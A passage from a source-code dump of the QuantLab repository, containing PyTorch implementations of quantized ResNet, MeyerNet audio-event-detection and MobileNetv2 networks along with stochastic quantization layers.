'https://download.pytorch.org/models/resnet152-b121ed2d.pth',\n 'resnext50_32x4d': 'https://download.pytorch.org/models/resnext50_32x4d-7cdf4587.pth',\n 'resnext101_32x8d': 'https://download.pytorch.org/models/resnext101_32x8d-8ba56ff5.pth',\n 'wide_resnet50_2': 'https://download.pytorch.org/models/wide_resnet50_2-95faca4d.pth',\n 'wide_resnet101_2': 'https://download.pytorch.org/models/wide_resnet101_2-32ee1156.pth',\n}\n\nclass BasicBlock(nn.Module):\n expansion = 1\n __constants__ = ['downsample']\n\n def __init__(self, inplanes, planes, stride=1, downsample=None, groups=1,\n base_width=64, dilation=1, norm_layer=None, convGen=None):\n super(BasicBlock, self).__init__()\n if norm_layer is None:\n norm_layer = nn.BatchNorm2d\n if groups != 1 or base_width != 64:\n raise ValueError('BasicBlock only supports groups=1 and base_width=64')\n if dilation > 1:\n raise NotImplementedError(\"Dilation > 1 not supported in BasicBlock\")\n # Both self.conv1 and self.downsample layers downsample the input when stride != 1\n self.conv1 = convGen(inplanes, planes, kernel_size=3, stride=stride)\n self.bn1 = norm_layer(planes)\n self.relu = nn.ReLU(inplace=True)\n self.conv2 = convGen(planes, planes, kernel_size=3)\n self.bn2 = norm_layer(planes)\n self.downsample = downsample\n self.stride = stride\n\n def forward(self, x):\n identity = x\n\n out = self.conv1(x)\n out = self.bn1(out)\n out = self.relu(out)\n\n out = self.conv2(out)\n out = self.bn2(out)\n\n if self.downsample is not None:\n identity = self.downsample(x)\n\n out += identity\n out = self.relu(out)\n\n return out\n\n\nclass Bottleneck(nn.Module):\n expansion = 4\n\n def __init__(self, inplanes, planes, stride=1, downsample=None, groups=1,\n base_width=64, dilation=1, norm_layer=None, convGen=None):\n super(Bottleneck, self).__init__()\n if norm_layer is None:\n norm_layer = nn.BatchNorm2d\n width = int(planes * (base_width / 64.)) * groups\n # Both self.conv2 and self.downsample layers downsample the input when stride != 1\n self.conv1 = convGen(inplanes, width, kernel_size=1)\n self.bn1 = norm_layer(width)\n self.conv2 = convGen(width, width, kernel_size=3, \n stride=stride, groups=groups, dilation=dilation)\n self.bn2 = norm_layer(width)\n self.conv3 = convGen(width, planes * self.expansion, kernel_size=1)\n self.bn3 = norm_layer(planes * self.expansion)\n self.relu = nn.ReLU(inplace=True)\n self.downsample = downsample\n self.stride = stride\n\n def forward(self, x):\n identity = x\n\n out = self.conv1(x)\n out = self.bn1(out)\n out = self.relu(out)\n\n out = self.conv2(out)\n out = self.bn2(out)\n out = self.relu(out)\n\n out = self.conv3(out)\n out = self.bn3(out)\n\n if self.downsample is not None:\n identity = self.downsample(x)\n\n out += identity\n out = self.relu(out)\n\n return out\n\n\nclass ResNet(nn.Module):\n def __init__(self, arch='resnet18', quant_schemes=None, \n quantWeights=True, quantAct=True,\n weightInqSchedule=None, weightInqBits=None, weightInqLevels=None,\n weightInqStrategy=\"magnitude\", weightInqQuantInit=None,\n quantSkipFirstLayer=False, quantSkipLastLayer=False, pretrained=False):\n \n super(ResNet, self).__init__()\n assert(quantAct == False)\n assert(quantSkipFirstLayer)\n assert(quantSkipLastLayer)\n if weightInqBits != None:\n print('warning: weightInqBits deprecated')\n if weightInqBits == 1:\n weightInqLevels = 2\n elif weightInqBits >= 2:\n weightInqLevels = 2**weightInqBits\n else:\n assert(False) \n \n def convGen(in_planes, out_planes, kernel_size=None, stride=1, \n groups=1, dilation=1, firstLayer=False):\n \"\"\"3x3 convolution with padding\"\"\"\n \n if kernel_size == 3:\n padding = dilation\n elif kernel_size == 1:\n padding = 0\n elif kernel_size == 7:\n padding = 3\n else:\n assert(False)\n \n if firstLayer or not(quantWeights): \n return nn.Conv2d(in_planes, out_planes, kernel_size=kernel_size, stride=stride,\n padding=padding, groups=groups, bias=False, dilation=dilation)\n else:\n return INQConv2d(in_planes, out_planes, kernel_size=kernel_size, stride=stride,\n padding=padding, groups=groups, bias=False, dilation=dilation, \n numLevels=weightInqLevels, strategy=weightInqStrategy,\n quantInitMethod=weightInqQuantInit)\n \n class BasicBlockWrap(BasicBlock):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs, convGen=convGen)\n class BottleneckWrap(Bottleneck):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs, convGen=convGen)\n \n if arch == 'resnet18':\n block = BasicBlockWrap\n layers = [2, 2, 2, 2]\n elif arch == 'resnet34':\n block = BasicBlockWrap\n layers = [3, 4, 6, 3]\n elif arch == 'resnet50':\n block = BottleneckWrap\n layers = [3, 4, 6, 3]\n elif arch == 'resnet101':\n block = BottleneckWrap\n layers = [3, 4, 23, 3]\n elif arch == 'resnet152':\n block = BottleneckWrap\n layers = [3, 8, 36, 3]\n else:\n assert(False)\n \n self.createNet(block, layers, convGen,\n num_classes=1000, zero_init_residual=False, groups=1, \n width_per_group=64, replace_stride_with_dilation=None, norm_layer=None)\n \n if pretrained:\n from torch.hub import load_state_dict_from_url\n state_dict = load_state_dict_from_url(model_urls[arch])\n missing_keys, unexpected_keys = self.load_state_dict(state_dict, strict=False)\n \n missing_keys_nonInq = [s for s in missing_keys if not (s.endswith('.sParam') or s.endswith('.weightFrozen'))]\n assert(len(unexpected_keys) == 0)\n assert(len(missing_keys_nonInq) == 0)\n# if len(missing_keys) > 0:\n# print('load_state_dict -- missing keys:')\n# print(missing_keys)\n# if len(unexpected_keys) > 0:\n# print('load_state_dict -- unexpected keys:')\n# print(unexpected_keys)\n \n if weightInqSchedule != None: \n self.inqController = INQController(INQController.getInqModules(self), \n weightInqSchedule, \n clearOptimStateOnStep=True)\n\n\n def createNet(self, block, layers, convGen, \n num_classes=1000, zero_init_residual=False, groups=1, \n width_per_group=64, replace_stride_with_dilation=None, norm_layer=None):\n if norm_layer is None:\n norm_layer = nn.BatchNorm2d\n self._norm_layer = norm_layer\n\n self.inplanes = 64\n self.dilation = 1\n if replace_stride_with_dilation is None:\n # each element in the tuple indicates if we should replace\n # the 2x2 stride with a dilated convolution instead\n replace_stride_with_dilation = [False, False, False]\n if len(replace_stride_with_dilation) != 3:\n raise ValueError(\"replace_stride_with_dilation should be None \"\n \"or a 3-element tuple, got {}\".format(replace_stride_with_dilation))\n self.groups = groups\n self.base_width = width_per_group\n self.conv1 = convGen(3, self.inplanes, kernel_size=7, stride=2, firstLayer=True)\n# self.conv1 = nn.Conv2d(3, self.inplanes, kernel_size=7, stride=2, padding=3,\n# bias=False)\n self.bn1 = norm_layer(self.inplanes)\n self.relu = nn.ReLU(inplace=True)\n self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)\n self.layer1 = self._make_layer(block, 64, layers[0], \n convGen=convGen)\n self.layer2 = self._make_layer(block, 128, layers[1], stride=2,\n dilate=replace_stride_with_dilation[0], \n convGen=convGen)\n self.layer3 = self._make_layer(block, 256, layers[2], stride=2,\n dilate=replace_stride_with_dilation[1], \n convGen=convGen)\n self.layer4 = self._make_layer(block, 512, layers[3], stride=2,\n dilate=replace_stride_with_dilation[2], \n convGen=convGen)\n self.avgpool = nn.AdaptiveAvgPool2d((1, 1))\n self.fc = nn.Linear(512 * block.expansion, num_classes)\n\n for m in self.modules():\n if isinstance(m, nn.Conv2d) or isinstance(m, INQConv2d):\n nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')\n elif isinstance(m, (nn.BatchNorm2d, nn.GroupNorm)):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)\n\n # Zero-initialize the last BN in each residual branch,\n # so that the residual branch starts with zeros, and each residual block behaves like an identity.\n # This improves the model by 0.2~0.3% according to https://arxiv.org/abs/1706.02677\n if zero_init_residual:\n for m in self.modules():\n if isinstance(m, Bottleneck):\n nn.init.constant_(m.bn3.weight, 0)\n elif isinstance(m, BasicBlock):\n nn.init.constant_(m.bn2.weight, 0)\n \n\n def _make_layer(self, block, planes, blocks, stride=1, dilate=False, convGen=None):\n norm_layer = self._norm_layer\n downsample = None\n previous_dilation = self.dilation\n if dilate:\n self.dilation *= stride\n stride = 1\n if stride != 1 or self.inplanes != planes * block.expansion:\n downsample = nn.Sequential(\n convGen(self.inplanes, planes*block.expansion, \n kernel_size=1, stride=stride),\n norm_layer(planes * block.expansion),\n )\n\n layers = []\n layers.append(block(self.inplanes, planes, stride, downsample, self.groups,\n self.base_width, previous_dilation, norm_layer))\n self.inplanes = planes * block.expansion\n for _ in range(1, blocks):\n layers.append(block(self.inplanes, planes, groups=self.groups,\n base_width=self.base_width, dilation=self.dilation,\n norm_layer=norm_layer))\n\n return nn.Sequential(*layers)\n\n def forward(self, x, withStats=False):\n x = self.conv1(x)\n x = self.bn1(x)\n x = self.relu(x)\n x = self.maxpool(x)\n\n x = self.layer1(x)\n x = self.layer2(x)\n x = self.layer3(x)\n x = self.layer4(x)\n\n x = self.avgpool(x)\n x = torch.flatten(x, 1)\n x = self.fc(x)\n \n if withStats:\n stats = []\n return stats, x\n\n return x\n \n\n def forward_with_tensor_stats(self, x):\n stats, x = self.forward(x, withStats=True)\n return stats, x\n \n \nif __name__ == \"__main__\":\n model = ResNet(arch='resnet18', quantAct=False, weightInqSchedule={}, \n quantSkipFirstLayer=True, quantSkipLastLayer=True, \n pretrained=True)\n \n loadModel = True\n if loadModel:\n # path = '../../../ImageNet/logs/exp038/saves/best-backup.ckpt' # BWN\n# path = '../../../ImageNet/logs/exp043/saves/best.ckpt' # TWN\n path = '../../../ImageNet/logs/exp054/saves/best.ckpt' # BWN\n fullState = torch.load(path, map_location='cpu')\n netState = fullState['indiv']['net']\n model.load_state_dict(netState)\n \n import matplotlib.pyplot as plt\n layerNames = list(netState.keys())\n selectedLayers = ['layer4.0.conv1', \n 'layer2.1.conv2', \n 'layer1.0.conv2']\n # selectedLayers = [l + '.weight' for l in selectedLayers]\n selectedLayers = [l + '.weightFrozen' for l in selectedLayers]\n _, axarr = plt.subplots(len(selectedLayers))\n for ax, layerName in zip(axarr, selectedLayers):\n plt.sca(ax)\n plt.hist(netState[layerName].flatten(), \n bins=201, range=(-3,3))\n plt.xlim(-3,3)\n plt.title(layerName)\n \n exportONNX = False\n if exportONNX:\n modelFullPrec = ResNet(arch='resnet18', quantAct=False, quantWeights=False, \n weightInqSchedule={}, \n quantSkipFirstLayer=True, \n quantSkipLastLayer=True, \n pretrained=True)\n dummyInput = torch.randn(1, 3, 224, 224)\n pbuf = torch.onnx.export(modelFullPrec, dummyInput, \n \"export.onnx\", verbose=True, \n input_names=['input'], \n output_names=['output'])\n \n \n \n \n \n \n \n \n" }, { "alpha_fraction": 0.49250349402427673, "alphanum_fraction": 0.5359135270118713, "avg_line_length": 37.49664306640625, "blob_id": "01543294f1ccedd89e9140eae5a021a362f963ed", "content_id": "56f9362cc3a5b2c633ada707eceb8d14179767bf", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5736, "license_type": "permissive", "max_line_length": 98, "num_lines": 149, "path": "/quantlab/ETHZ-CVL-AED/MeyerNet/meyernet.py", "repo_name": "xiaywang/QuantLab", "src_encoding": "UTF-8", "text": "# Copyright (c) 2019 ETH Zurich, Lukas Cavigelli\n\nimport torch\nimport torch.nn as nn\nimport math\n\nfrom quantlab.indiv.stochastic_ops import StochasticActivation, StochasticLinear, StochasticConv2d\n\nclass MeyerNet(nn.Module):\n \"\"\"Audio Event Detection quantized Network.\"\"\"\n def __init__(self, capacityFactor=1.0, version=1, \n quantized=True, quant_scheme=None, \n quantFirstLast=True, withTwoAct=False, noTimePooling=False):\n super().__init__()\n self.noTimePooling = noTimePooling\n \n def conv1quant(quant_scheme, ni, no, stride=1, padding=1): \n return StochasticConv2d(*quant_scheme, ni, no, kernel_size=1, \n stride=stride, padding=0, bias=False)\n def conv3quant(quant_scheme, ni, no, stride=1, padding=1): \n return StochasticConv2d(*quant_scheme, ni, no, kernel_size=3, \n stride=stride, padding=1, bias=False)\n def conv1float(quant_scheme, ni, no, stride=1, padding=1): \n return nn.Conv2d(ni, no, kernel_size=1, \n stride=stride, padding=0, bias=False)\n def conv3float(quant_scheme, ni, no, stride=1, padding=1): \n return nn.Conv2d(ni, no, kernel_size=3, \n stride=stride, padding=1, bias=False)\n if quantized:\n conv1 = conv1quant\n conv3 = conv3quant\n activ = lambda quant_scheme, nc: StochasticActivation(*quant_scheme, nc)\n if withTwoAct:\n activ2 = lambda nc: nn.ReLU(inplace=True)\n else:\n activ2 = lambda nc: nn.Identity()\n quantScheme = lambda s: quant_scheme[s] \n else:\n conv1 = conv1float\n conv3 = conv3float\n activ = lambda quant_scheme, nc: nn.ReLU(inplace=True)\n activ2 = lambda nc: nn.Identity()\n quantScheme = lambda s: None\n \n bnorm = lambda nc: nn.BatchNorm2d(nc) \n# bnorm = lambda nc: nn.Identity() # don't forget to enable/disable bias\n c = lambda v: math.ceil(v*capacityFactor)\n \n c1, c2, c3, c4, c5, c6 = c(64), c(64), c(128), c(128), c(128), c(128)\n if version >= 2: \n c1 = c(32)\n\n if quantFirstLast:\n self.phi1_conv = conv3(quantScheme('phi1_conv'), 1, c1)\n else: \n self.phi1_conv = conv3float(None, 1, c1)\n self.phi1_act2 = activ2(c1)\n self.phi1_bn = bnorm(c1)\n self.phi1_act = activ(quantScheme('phi1_act'), c1)\n \n self.phi2_conv = conv3(quantScheme('phi2_conv'), c1, c2, stride=2)\n self.phi2_act2 = activ2(c2)\n self.phi2_bn = bnorm(c2)\n self.phi2_act = activ(quantScheme('phi2_act'), c2)\n \n self.phi3_conv = conv3(quantScheme('phi3_conv'), c2, c3)\n self.phi3_act2 = activ2(c3)\n self.phi3_bn = bnorm(c3)\n self.phi3_act = activ(quantScheme('phi3_act'), c3)\n \n if version >= 3: \n self.phi4_do = nn.Dropout2d(0.5)\n else: \n self.phi4_do = nn.Identity()\n self.phi4_conv = conv3(quantScheme('phi4_conv'), c3, c4, stride=2)\n self.phi4_act2 = activ2(c4)\n self.phi4_bn = bnorm(c4)\n self.phi4_act = activ(quantScheme('phi4_act'), c4)\n \n self.phi5_conv = conv3(quantScheme('phi5_conv'), c4, c5)\n self.phi5_act2 = activ2(c5)\n self.phi5_bn = bnorm(c5)\n self.phi5_act = activ(quantScheme('phi5_act'), c5)\n \n self.phi6_conv = conv1(quantScheme('phi6_conv'), c5, c6)\n self.phi6_act2 = activ2(c6)\n self.phi6_bn = bnorm(c6)\n \n if quantFirstLast:\n self.phi6_act = activ(quantScheme('phi6_act'), c6)\n self.phi7_conv = conv1(quantScheme('phi7_conv'), c6, 28)\n else:\n self.phi6_act = nn.Identity()\n self.phi7_conv = conv1float(None, c6, 28)\n self.phi7_bn = bnorm(28)\n \n if noTimePooling:\n self.phi8_pool = nn.AvgPool2d(kernel_size=(16,1), stride=1, padding=0)\n else:\n self.phi8_pool = nn.AvgPool2d(kernel_size=(16,100), stride=1, padding=0)\n\n def forward(self, x, withStats=False):\n stats = []\n x = self.phi1_conv(x)\n x = self.phi1_act2(x)\n x = self.phi1_bn(x)\n x = self.phi1_act(x)\n x = self.phi2_conv(x)\n x = self.phi2_act2(x)\n x = self.phi2_bn(x)\n x = self.phi2_act(x)\n x = self.phi3_conv(x)\n x = self.phi3_act2(x)\n x = self.phi3_bn(x)\n x = self.phi3_act(x)\n x = self.phi4_do(x)\n x = self.phi4_conv(x)\n x = self.phi4_act2(x)\n x = self.phi4_bn(x)\n x = self.phi4_act(x)\n x = self.phi5_conv(x)\n x = self.phi5_act2(x)\n x = self.phi5_bn(x)\n x = self.phi5_act(x)\n x = self.phi6_conv(x)\n x = self.phi6_act2(x)\n x = self.phi6_bn(x)\n x = self.phi6_act(x)\n x = self.phi7_conv(x)\n x = self.phi7_bn(x)\n x = self.phi8_pool(x)\n \n if self.noTimePooling:\n x = x.permute(0,2,3,1).reshape(-1, 28)\n else:\n x = x.reshape(x.size(0), 28)\n \n if withStats:\n stats.append(('phi1_conv_w', self.phi1_conv.weight.data))\n stats.append(('phi3_conv_w', self.phi3_conv.weight.data))\n stats.append(('phi5_conv_w', self.phi5_conv.weight.data))\n stats.append(('phi7_conv_w', self.phi7_conv.weight.data))\n return stats, x\n else: \n return x\n\n def forward_with_tensor_stats(self, x):\n stats, x = self.forward(x, withStats=True)\n return stats, x\n" }, { "alpha_fraction": 0.5537204742431641, "alphanum_fraction": 0.5598472952842712, "avg_line_length": 47.83185958862305, "blob_id": "b0dbede634e093d93f4f344d97c61d0d1c841307", "content_id": "3bf76e8366d459d052a06a61471035c6b77433ee", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11262, "license_type": "permissive", "max_line_length": 126, "num_lines": 226, "path": "/quantlab/indiv/stochastic_ops.py", "repo_name": "xiaywang/QuantLab", "src_encoding": "UTF-8", "text": "# Copyright (c) 2019 UniMoRe, Matteo Spallanzani\r\n# Copyright (c) 2019 ETH Zurich, Lukas Cavigelli\r\n\r\nimport math\r\n# from scipy.stats import norm, uniform\r\nimport torch\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\nfrom torch.nn.modules.utils import _single, _pair, _triple\r\n\r\n#from .cuda import init_ffi_lib, UHP_forward, UHP_backward\r\n\r\n\r\nclass UniformHeavisideProcess(torch.autograd.Function):\r\n \"\"\"A Stochastic Process composed by step functions.\r\n\r\n This class defines a stochastic process whose elementary events are step\r\n functions with fixed quantization levels (codominion) and uniform noise on\r\n the jumps positions.\r\n \"\"\"\r\n @staticmethod\r\n def forward(ctx, x, t, q, s, training):\r\n ctx.save_for_backward(x, t, q, s)\r\n t_shape = [*t.size()] + [1 for _ in range(x.dim())] # dimensions with size 1 enable broadcasting\r\n x_minus_t = x - t.reshape(t_shape)\r\n if training and s[0] != 0.:\r\n sf_inv = 1 / s[0]\r\n cdf = torch.clamp((0.5 * x_minus_t) * sf_inv + 0.5, 0., 1.)\r\n else:\r\n cdf = (x_minus_t >= 0.).float()\r\n d = q[1:] - q[:-1]\r\n sigma_x = q[0] + torch.sum(d.reshape(t_shape) * cdf, 0)\r\n return sigma_x\r\n\r\n @staticmethod\r\n def backward(ctx, grad_incoming):\r\n x, t, q, s = ctx.saved_tensors\r\n t_shape = [*t.size()] + [1 for _ in range(x.dim())] # dimensions with size 1 enable broadcasting\r\n x_minus_t = x - t.reshape(t_shape)\r\n if s[1] != 0.:\r\n sb_inv = 1 / s[1]\r\n pdf = (torch.abs_(x_minus_t) <= s[1]).float() * (0.5 * sb_inv)\r\n else:\r\n pdf = torch.zeros_like(grad_incoming)\r\n d = q[1:] - q[:-1]\r\n local_jacobian = torch.sum(d.reshape(t_shape) * pdf, 0)\r\n grad_outgoing = grad_incoming * local_jacobian\r\n return grad_outgoing, None, None, None, None\r\n\r\n\r\nclass StochasticActivation(nn.Module):\r\n \"\"\"Quantize scores.\"\"\"\r\n def __init__(self, process, thresholds, quant_levels):\r\n super(StochasticActivation, self).__init__()\r\n self.process = process\r\n if self.process == 'uniform':\r\n self.activate = UniformHeavisideProcess.apply\r\n super(StochasticActivation, self).register_parameter('thresholds',\r\n nn.Parameter(torch.Tensor(thresholds),\r\n requires_grad=False))\r\n super(StochasticActivation, self).register_parameter('quant_levels',\r\n nn.Parameter(torch.Tensor(quant_levels),\r\n requires_grad=False))\r\n super(StochasticActivation, self).register_parameter('stddev',\r\n nn.Parameter(torch.Tensor(torch.ones(2)),\r\n requires_grad=False))\r\n\r\n def set_stddev(self, stddev):\r\n self.stddev.data = torch.Tensor(stddev).to(self.stddev)\r\n\r\n def forward(self, x):\r\n return self.activate(x, self.thresholds, self.quant_levels, self.stddev, self.training)\r\n\r\n\r\nclass StochasticLinear(nn.Module):\r\n \"\"\"Affine transform with quantized parameters.\"\"\"\r\n def __init__(self, process, thresholds, quant_levels, in_features, out_features, bias=True):\r\n super(StochasticLinear, self).__init__()\r\n # set stochastic properties\r\n self.process = process\r\n if self.process == 'uniform':\r\n self.activate_weight = UniformHeavisideProcess.apply\r\n super(StochasticLinear, self).register_parameter('thresholds',\r\n nn.Parameter(torch.Tensor(thresholds),\r\n requires_grad=False))\r\n super(StochasticLinear, self).register_parameter('quant_levels',\r\n nn.Parameter(torch.Tensor(quant_levels),\r\n requires_grad=False))\r\n super(StochasticLinear, self).register_parameter('stddev',\r\n nn.Parameter(torch.Tensor(torch.ones(2)),\r\n requires_grad=False))\r\n # set linear layer properties\r\n self.in_features = in_features\r\n self.out_features = out_features\r\n self.weight = nn.Parameter(torch.Tensor(out_features, in_features))\r\n if bias:\r\n self.bias = nn.Parameter(torch.Tensor(out_features))\r\n else:\r\n self.register_parameter('bias', None)\r\n self.reset_parameters()\r\n\r\n def reset_parameters(self):\r\n stdv = 1. / math.sqrt(self.weight.size(1))\r\n # init weights near thresholds\r\n self.weight.data.random_(to=len(self.thresholds.data))\r\n self.weight.data = self.thresholds[self.weight.data.to(torch.long)]\r\n self.weight.data = torch.add(self.weight.data, torch.zeros_like(self.weight.data).uniform_(-stdv, stdv))\r\n # init biases\r\n if self.bias is not None:\r\n self.bias.data.uniform_(-stdv, stdv)\r\n\r\n def set_stddev(self, stddev):\r\n self.stddev.data = torch.Tensor(stddev).to(self.stddev)\r\n\r\n def forward(self, input):\r\n weight = self.activate_weight(self.weight, self.thresholds, self.quant_levels, self.stddev, self.training)\r\n return F.linear(input, weight, self.bias)\r\n\r\n\r\nclass _StochasticConvNd(nn.Module):\r\n \"\"\"Cross-correlation transform with quantized parameters.\"\"\"\r\n def __init__(self, process, thresholds, quant_levels,\r\n in_channels, out_channels, kernel_size, stride, padding, dilation, transposed, output_padding, groups, bias):\r\n super(_StochasticConvNd, self).__init__()\r\n # set stochastic properties\r\n self.process = process\r\n if self.process == 'uniform':\r\n self.activate_weight = UniformHeavisideProcess.apply\r\n super(_StochasticConvNd, self).register_parameter('thresholds',\r\n nn.Parameter(torch.Tensor(thresholds),\r\n requires_grad=False))\r\n super(_StochasticConvNd, self).register_parameter('quant_levels',\r\n nn.Parameter(torch.Tensor(quant_levels),\r\n requires_grad=False))\r\n super(_StochasticConvNd, self).register_parameter('stddev',\r\n nn.Parameter(torch.Tensor(torch.ones(2)),\r\n requires_grad=False))\r\n # set convolutional layer properties\r\n if in_channels % groups != 0:\r\n raise ValueError('in_channels must be divisible by groups')\r\n if out_channels % groups != 0:\r\n raise ValueError('out_channels must be divisible by groups')\r\n self.in_channels = in_channels\r\n self.out_channels = out_channels\r\n self.kernel_size = kernel_size\r\n self.stride = stride\r\n self.padding = padding\r\n self.dilation = dilation\r\n self.transposed = transposed\r\n self.output_padding = output_padding\r\n self.groups = groups\r\n if transposed:\r\n self.weight = nn.Parameter(torch.Tensor(\r\n in_channels, out_channels // groups, *kernel_size))\r\n else:\r\n self.weight = nn.Parameter(torch.Tensor(\r\n out_channels, in_channels // groups, *kernel_size))\r\n if bias:\r\n self.bias = nn.Parameter(torch.Tensor(out_channels))\r\n else:\r\n self.register_parameter('bias', None)\r\n self.reset_parameters()\r\n\r\n def reset_parameters(self):\r\n n = self.in_channels\r\n for k in self.kernel_size:\r\n n *= k\r\n stdv = 1. / math.sqrt(n)\r\n # init weights near thresholds\r\n self.weight.data.random_(to=len(self.thresholds.data))\r\n self.weight.data = self.thresholds[self.weight.data.to(torch.long)]\r\n self.weight.data = torch.add(self.weight.data, torch.zeros_like(self.weight.data).uniform_(-stdv, stdv))\r\n # init biases\r\n if self.bias is not None:\r\n self.bias.data.uniform_(-stdv, stdv)\r\n\r\n def set_stddev(self, stddev):\r\n self.stddev.data = torch.Tensor(stddev).to(self.stddev)\r\n\r\n\r\nclass StochasticConv1d(_StochasticConvNd):\r\n def __init__(self, process, thresholds, quant_levels,\r\n in_channels, out_channels, kernel_size, stride=1, padding=0, dilation=1, groups=1, bias=True):\r\n kernel_size = _single(kernel_size)\r\n stride = _single(stride)\r\n padding = _single(padding)\r\n dilation = _single(dilation)\r\n super(StochasticConv1d, self).__init__(\r\n process, thresholds, quant_levels,\r\n in_channels, out_channels, kernel_size, stride, padding, dilation, False, _single(0), groups, bias)\r\n\r\n def forward(self, input):\r\n weight = self.activate_weight(self.weight, self.thresholds, self.quant_levels, self.stddev, self.training)\r\n return F.conv1d(input, weight, self.bias, self.stride, self.padding, self.dilation, self.groups)\r\n\r\n\r\nclass StochasticConv2d(_StochasticConvNd):\r\n def __init__(self, process, thresholds, quant_levels,\r\n in_channels, out_channels, kernel_size, stride=1, padding=0, dilation=1, groups=1, bias=True):\r\n kernel_size = _pair(kernel_size)\r\n stride = _pair(stride)\r\n padding = _pair(padding)\r\n dilation = _pair(dilation)\r\n super(StochasticConv2d, self).__init__(\r\n process, thresholds, quant_levels,\r\n in_channels, out_channels, kernel_size, stride, padding, dilation, False, _pair(0), groups, bias)\r\n\r\n def forward(self, input):\r\n weight = self.activate_weight(self.weight, self.thresholds, self.quant_levels, self.stddev, self.training)\r\n return F.conv2d(input, weight, self.bias, self.stride, self.padding, self.dilation, self.groups)\r\n\r\n\r\nclass StochasticConv3d(_StochasticConvNd):\r\n def __init__(self, process, thresholds, quant_levels,\r\n in_channels, out_channels, kernel_size, stride=1, padding=0, dilation=1, groups=1, bias=True):\r\n kernel_size = _triple(kernel_size)\r\n stride = _triple(stride)\r\n padding = _triple(padding)\r\n dilation = _triple(dilation)\r\n super(StochasticConv3d, self).__init__(\r\n process, thresholds, quant_levels,\r\n in_channels, out_channels, kernel_size, stride, padding, dilation, False, _triple(0), groups, bias)\r\n\r\n def forward(self, input):\r\n weight = self.activate_weight(self.weight, self.thresholds, self.quant_levels, self.stddev, self.training)\r\n return F.conv3d(input, weight, self.bias, self.stride, self.padding, self.dilation, self.groups)\r\n" }, { "alpha_fraction": 0.5062753558158875, "alphanum_fraction": 0.5662177801132202, "avg_line_length": 49.27631759643555, "blob_id": "be3a00043afc6f83083376f4e03a1bf715d0ce83", "content_id": "b89baa1d4675296708363aa7c4453d3005b70e7d", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 15298, "license_type": "permissive", "max_line_length": 99, "num_lines": 304, "path": "/quantlab/ImageNet/MobileNetv2/mobilenetv2quantWeight.py", "repo_name": "xiaywang/QuantLab", "src_encoding": "UTF-8", "text": "# Copyright (c) 2019 UniMoRe, Matteo Spallanzani\n# Copyright (c) 2019 ETH Zurich, Lukas Cavigelli\n\nimport math\nimport torch.nn as nn\n\n#from quantlab.indiv.stochastic_ops import StochasticActivation, StochasticLinear, StochasticConv2d\nfrom quantlab.indiv.inq_ops import INQController, INQLinear, INQConv2d\n#from quantlab.indiv.ste_ops import STEActivation\n\nfrom quantlab.ImageNet.MobileNetv2.mobilenetv2baseline import MobileNetv2Baseline\n\nclass MobileNetv2QuantWeight(MobileNetv2Baseline):\n \"\"\"MobileNetv2 Convolutional Neural Network.\"\"\"\n def __init__(self, capacity=1, expansion=6, quant_schemes=None, \n quantWeights=True, quantAct=True,\n weightInqSchedule=None, weightInqLevels=None, \n weightInqStrategy=\"magnitude\", weightInqQuantInit=None, \n quantSkipFirstLayer=False, quantSkipLastLayer=False, \n quantDepthwSep=True, pretrained=False):\n \n super().__init__(capacity, expansion)\n assert(quantAct == False)\n \n c0 = 3\n t0 = int(32 * capacity)\n c1 = int(16 * capacity)\n t1 = c1 * expansion\n c2 = int(24 * capacity)\n t2 = c2 * expansion\n c3 = int(32 * capacity)\n t3 = c3 * expansion\n c4 = int(64 * capacity)\n t4 = c4 * expansion\n c5 = int(96 * capacity)\n t5 = c5 * expansion\n c6 = int(160 * capacity)\n t6 = c6 * expansion\n c7 = int(320 * capacity)\n c8 = max(int(1280 * capacity), 1280)\n \n def conv2d(ni, no, kernel_size=3, stride=1, padding=1, groups=1, bias=False):\n if (quantWeights and \n (quantDepthwSep or \n (ni != groups or ni != no))): # not depthw. sep. layer\n assert(weightInqSchedule != None)\n return INQConv2d(ni, no, \n kernel_size=kernel_size, stride=stride, \n padding=padding, groups=groups, bias=bias, \n numLevels=weightInqLevels, \n strategy=weightInqStrategy, \n quantInitMethod=weightInqQuantInit)\n else: \n return nn.Conv2d(ni, no, \n kernel_size=kernel_size, stride=stride, \n padding=padding, groups=groups, bias=bias)\n \n def activ():\n return nn.ReLU6(inplace=True)\n \n # first block\n if quantSkipFirstLayer:\n self.phi01_conv = conv2d(c0, t0, kernel_size=3, stride=2, padding=1, bias=False)\n else:\n self.phi01_conv = nn.Conv2d(c0, t0, kernel_size=3, stride=2, padding=1, bias=False)\n self.phi01_bn = nn.BatchNorm2d(t0)\n self.phi01_act = activ()\n self.phi02_conv = conv2d(t0, t0, kernel_size=3, stride=1, padding=1, groups=t0, bias=False)\n self.phi02_bn = nn.BatchNorm2d(t0)\n self.phi02_act = activ()\n self.phi03_conv = conv2d(t0, c1, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi03_bn = nn.BatchNorm2d(c1)\n # second block\n self.phi04_conv = conv2d(c1, t1, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi04_bn = nn.BatchNorm2d(t1)\n self.phi04_act = activ()\n self.phi05_conv = conv2d(t1, t1, kernel_size=3, stride=2, padding=1, groups=t1, bias=False)\n self.phi05_bn = nn.BatchNorm2d(t1)\n self.phi05_act = activ()\n self.phi06_conv = conv2d(t1, c2, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi06_bn = nn.BatchNorm2d(c2)\n self.phi06_act = activ()\n self.phi07_conv = conv2d(c2, t2, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi07_bn = nn.BatchNorm2d(t2)\n self.phi07_act = activ()\n self.phi08_conv = conv2d(t2, t2, kernel_size=3, stride=1, padding=1, groups=t2, bias=False)\n self.phi08_bn = nn.BatchNorm2d(t2)\n self.phi08_act = activ()\n self.phi09_conv = conv2d(t2, c2, kernel_size=1, stride=1, padding=0, 